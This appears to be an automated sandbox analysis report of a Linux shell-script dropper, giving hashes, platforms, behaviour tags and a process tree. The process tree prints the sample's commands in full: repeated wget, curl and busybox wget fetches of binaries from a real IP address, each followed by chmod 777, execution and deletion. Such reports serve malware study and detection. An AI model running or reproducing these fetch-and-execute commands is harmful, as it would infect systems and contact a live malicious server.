Analysis
-
max time kernel
66s -
max time network
68s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:739
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:746
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:752
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:786
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:809
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:815
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:821
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:849
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:866
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:872
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:878
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:884
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:890
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:896
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:902
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:908
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:914
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:920
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:926
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:932
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:938
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:944
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:950
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:956
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:962
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:968
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:974
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:980
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97